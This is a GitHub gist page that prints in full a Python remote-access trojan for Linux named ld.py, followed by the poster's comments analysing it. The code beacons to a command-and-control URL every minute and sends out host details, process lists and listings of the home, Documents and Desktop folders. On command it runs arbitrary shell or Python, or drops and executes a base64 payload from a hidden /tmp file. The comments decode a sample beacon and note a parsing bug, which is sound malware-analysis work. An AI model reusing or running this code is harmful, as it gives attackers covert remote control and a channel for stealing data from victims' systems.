Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Select an option

  • Save jrwren/78928fc5d36206167f32eb4bc489c5dc to your computer and use it in GitHub Desktop.

Select an option

Save jrwren/78928fc5d36206167f32eb4bc489c5dc to your computer and use it in GitHub Desktop.
ld.py
import string
import secrets
import os
import pwd
import platform
import time
import sys
import subprocess
import base64
import shlex
from pathlib import Path
import json
from urllib.parse import urlsplit
import datetime
import http.client
import sys
def get_os():
arch = platform.machine().lower()
if arch in ("x86_64", "amd64"):
return "linux_x64"
elif "arm" in arch or "aarch" in arch:
return "linux_arm"
else:
return "linux_unknown"
def get_boot_time():
with open("/proc/uptime", "r") as f:
uptime_seconds = float(f.readline().split()[0])
boot_time = datetime.datetime.now() - datetime.timedelta(seconds=uptime_seconds)
return boot_time
def get_host_name():
with open("/proc/sys/kernel/hostname", "r") as f:
return f.read().strip()
def get_user_name():
return os.getlogin()
def get_installation_time():
install_log_path = "/var/log/installer"
dpkg_log_path = "/var/log/dpkg.log"
if os.path.exists(install_log_path):
install_time = os.path.getctime(install_log_path)
elif os.path.exists(dpkg_log_path):
install_time = os.path.getctime(dpkg_log_path)
else:
return ""
return datetime.datetime.fromtimestamp(install_time)
def get_system_info():
manufacturer = ""
product_name = ""
try:
with open("/sys/class/dmi/id/sys_vendor", "r") as f:
manufacturer = f.read().strip()
except FileNotFoundError:
pass
try:
with open("/sys/class/dmi/id/product_name", "r") as f:
product_name = f.read().strip()
except FileNotFoundError:
pass
return manufacturer, product_name
def get_process_list():
process_list = []
current_pid = os.getpid()
for pid in os.listdir("/proc"):
if pid.isdigit():
try:
cmdline_path = os.path.join("/proc", pid, "cmdline")
if os.path.exists(cmdline_path):
with open(cmdline_path, "r") as cmdline_file:
cmdline = cmdline_file.read().replace("\x00", " ").strip()
else:
cmdline = "N/A"
with open(os.path.join("/proc", pid, "stat"), "r") as stat_file:
stat_content = stat_file.read().split()
ppid = int(stat_content[3])
start_time_ticks = int(stat_content[21])
with open("/proc/uptime", "r") as uptime_file:
uptime_seconds = float(uptime_file.readline().split()[0])
system_boot_time = datetime.datetime.now() - datetime.timedelta(
seconds=uptime_seconds
)
start_time = system_boot_time + datetime.timedelta(
seconds=start_time_ticks
/ os.sysconf(os.sysconf_names["SC_CLK_TCK"])
)
with open(os.path.join("/proc", pid, "status"), "r") as status_file:
for line in status_file:
if line.startswith("Uid:"):
uid = int(line.split()[1])
break
else:
uid = -1
username = "N/A"
if uid != -1:
with open("/etc/passwd", "r") as passwd_file:
for passwd_line in passwd_file:
fields = passwd_line.strip().split(":")
if int(fields[2]) == uid:
username = fields[0]
break
if int(pid) == current_pid:
process_list.append(
(int(pid), ppid, username, start_time, "*" + cmdline)
)
else:
process_list.append((int(pid), ppid, username, start_time, cmdline))
except (FileNotFoundError, IndexError, ValueError):
pass
return process_list
def print_process_list():
process_list = get_process_list()
str = ""
for pid, ppid, username, start_time, cmdline in process_list:
if len(cmdline) > 60:
cmdline = cmdline[:57] + "..."
start_time_str = start_time.strftime("%Y-%m-%d %H:%M:%S")
str += (
"{:<10} {:<10} {:<15} {:<25} {:<}".format(
pid, ppid, username, start_time_str, cmdline
)
+ "\n"
)
str += "\n"
return str
def generate_random_string(length):
characters = string.ascii_letters + string.digits
return "".join(secrets.choice(characters) for _ in range(length))
def do_action_ijt(ijtbin, param):
payload = base64.b64decode(b64_string)
file_path = f"/tmp/.{generate_random_string(6)}"
try:
with open(file_path, "wb") as file:
file.write(payload)
os.chmod(file_path, 0o777)
subprocess.Popen(
[file_path] + shlex.split(param.decode("utf-8", errors="strict"))
)
except Exception as e:
return {
"status": "Zzz",
"msg": str(e)
}
return {
"status": "Wow",
"msg": ""
}
def get_filelist(PathStr, id, Recurse=False):
p = Path(PathStr)
if not p.exists():
raise Exception(f"No Exists Such Dir: {PathStr}")
items = p.rglob("*") if Recurse else p.iterdir()
result = []
for item in items:
stat = item.stat()
created_ts = getattr(stat, "st_birthtime", None)
created = int(created_ts) if created_ts is not None else 0
modified = int(stat.st_mtime)
hasItems = False
if item.is_dir():
hasItems = any(item.iterdir())
result.append({
"Name": item.name,
"IsDir": item.is_dir(),
"SizeBytes": 0 if item.is_dir() else stat.st_size,
"Created": created,
"Modified": modified,
"HasItems": hasItems
})
return {
"id": id,
"parent": str(p),
"childs": result
}
def do_action_dir(Paths):
rlt = []
for item in Paths:
rlt.append(get_filelist(item["path"], item["id"]))
return rlt
def init_dir_info():
home_dir = Path.home()
init_dir = [
home_dir,
home_dir / ".config",
home_dir / "Documents",
home_dir / "Desktop",
]
rlt = []
idx = 0
for item in init_dir:
if item.exists():
rlt.append(get_filelist(str(item), "FirstReqPath-" + str(idx)))
idx = idx + 1
return rlt
def do_run_scpt(cmdline):
try:
result = subprocess.run(
cmdline,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True
)
return {
"status": "Wow",
"msg": result.stdout
}
except Exception as e:
return {
"status": "Zzz",
"msg": str(e)
}
def do_action_scpt(scpt, param):
if not scpt:
return do_run_scpt(param)
try:
payload = base64.b64decode(scpt).decode("utf-8", errors="strict")
result = subprocess.run(
["python3", "-c", payload] + shlex.split(param),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True
)
return {
"status": "Wow",
"msg": result.stdout
}
except Exception as e:
return {
"status": "Zzz",
"msg": str(e)
}
def send_post_request(full_url, data):
try:
url_parts = urlsplit(full_url)
host = url_parts.netloc
path = url_parts.path or "/"
if url_parts.query:
path += "?" + url_parts.query
if isinstance(data, str):
data = data.encode("utf-8")
if url_parts.scheme == "https":
conn = http.client.HTTPSConnection(host, timeout=60)
else:
conn = http.client.HTTPConnection(host, timeout=60)
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)",
}
conn.request("POST", path, data, headers)
response = conn.getresponse()
response_data = response.read()
conn.close()
return response_data
except Exception:
return None
def send_result(url, body):
encoded = base64.b64encode(
json.dumps(body, ensure_ascii=False).encode("utf-8")
).decode()
return send_post_request(url, encoded)
def process_request(url, uid, data) -> bool:
if len(data) == 0:
return False
json_obj = json.loads(data)
if json_obj.get("type") == "kill":
body = {
"type": "CmdResult",
"cmd": "rsp_kill",
"cmdid": json_obj.get("CmdID"),
"uid": uid,
"status": "success",
}
send_result(url, body)
sys.exit(0)
elif json_obj.get("type") == "peinject":
rlt = do_action_ijt(
json_obj.get("IjtBin"),
json_obj.get("Param")
)
body = {
"type": "CmdResult",
"cmd": "rsp_peinject",
"cmdid": json_obj.get("CmdID"),
"uid": uid,
"status": rlt.get("status"),
"msg": rlt.get("msg"),
}
send_result(url, body)
elif json_obj.get("type") == "runscript":
rlt = do_action_scpt(
json_obj.get("Script"),
json_obj.get("Param")
)
body = {
"type": "CmdResult",
"cmd": "rsp_runscript",
"cmdid": json_obj.get("CmdID"),
"uid": uid,
"status": rlt.get("status"),
"msg": rlt.get("msg"),
}
send_result(url, body)
elif json_obj.get("type") == "rundir":
rlt = do_action_dir(json_obj.get("ReqPaths"))
body = {
"type": "CmdResult",
"cmd": "rsp_rundir",
"cmdid": json_obj.get("CmdID"),
"status": "Wow",
"uid": uid,
"msg": rlt,
}
send_result(url, body)
return True
def main_work(url, uid):
boot_time = str(get_boot_time())
installation_time = str(get_installation_time())
timezone = str(datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo)
manufacturer, product_name = get_system_info()
os_version = platform.system() + " " + platform.release() + " "
os = get_os()
while True:
current_time = str(datetime.datetime.now())
ps = print_process_list()
data = {
"hostname": get_host_name(),
"username": get_user_name(),
"os": os,
"version": os_version,
"timezone": timezone,
"installDate": installation_time,
"bootTimeString": boot_time,
"currentTimeString": current_time,
"modelName": manufacturer,
"cpuType": product_name,
"processList": ps
}
body = {
"type": "BaseInfo",
"uid": uid,
"data": data
}
response_content = send_result(url, body)
if response_content:
result = process_request(url, uid, response_content)
time.sleep(60)
def work():
url = sys.argv[1]
uid = generate_random_string(16)
os = get_os()
dir_info = init_dir_info()
body = {
"type": "FirstInfo",
"uid": uid,
"os": os,
"content": dir_info
}
send_result(url, body)
main_work(url, uid)
return True
work()
see below
@jrwren
Copy link
Copy Markdown
Author

jrwren commented Mar 31, 2026

Posts base64 encoded payload like:

eyJ0eXBlIjogIkJhc2VJbmZvIiwgInVpZCI6ICJDWXhCeWl5NjFxcEJyQ0Y4IiwgImRhdGEiOiB7Imhvc3RuYW1lIjogIjBkZDg0NmMxZmE1MyIsICJ1c2VybmFtZSI6ICJyb290IiwgIm9zIjogImxpbnV4X3g2NCIsICJ2ZXJzaW9uIjogIkxpbnV4IDYuMTcuNS16YWJibHkrICIsICJ0aW1lem9uZSI6ICJFRFQiLCAiaW5zdGFsbERhdGUiOiAiMjAyNi0wMy0zMSAxMjoxNTozNS44MTY3NzciLCAiYm9vdFRpbWVTdHJpbmciOiAiMjAyNS0xMi0xOSAxNzoyMjoxMS44MTYzNzciLCAiY3VycmVudFRpbWVTdHJpbmciOiAiMjAyNi0wMy0zMSAxMjo0ODoyNi43MDY1MTAiLCAibW9kZWxOYW1lIjogIkdpZ2FieXRlIFRlY2hub2xvZ3kgQ28uLCBMdGQuIiwgImNwdVR5cGUiOiAiQjQ1MCBBT1JVUyBNIiwgInByb2Nlc3NMaXN0IjogIlxuIn19

which, when I ran in a container decodes to:

{"type": "BaseInfo", "uid": "CYxByiy61qpBrCF8", "data": {"hostname": "0dd846c1fa53", "username": "root", "os": "linux_x64", "version": "Linux 6.17.5-zabbly+ ", "timezone": "EDT", "installDate": "2026-03-31 12:15:35.816777", "bootTimeString": "2025-12-19 17:22:11.816377", "currentTimeString": "2026-03-31 12:48:26.706510", "modelName": "Gigabyte Technology Co., Ltd.", "cpuType": "B450 AORUS M", "processList": "\n"}}

Interestingly, processList is empty here, and I don't know why.

The first request posts this:

{"type": "FirstInfo", "uid": "gZgWhqe45tLCh2JA", "os": "linux_x64", "content": [{"id": "FirstReqPath-0", "parent": "/root", "childs": [{"Name": ".bashrc", "IsDir": false, "SizeBytes": 3106, "Created": 0, "Modified": 1713791067, "HasItems": false}, {"Name": ".profile", "IsDir": false, "SizeBytes": 161, "Created": 0, "Modified": 1713791067, "HasItems": false}, {"Name": ".npm", "IsDir": true, "SizeBytes": 0, "Created": 0, "Modified": 1774972884, "HasItems": true}, {"Name": ".lesshst", "IsDir": false, "SizeBytes": 45, "Created": 0, "Modified": 1774975950, "HasItems": false}]}]}

@jrwren
Copy link
Copy Markdown
Author

jrwren commented Mar 31, 2026

Interestingly, there is a bug in get_process_list on the whitespace splitting. process names in /proc/N/stat can have whitespace, so for example "tmux server" and "tmux client" will not get reported in the list.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment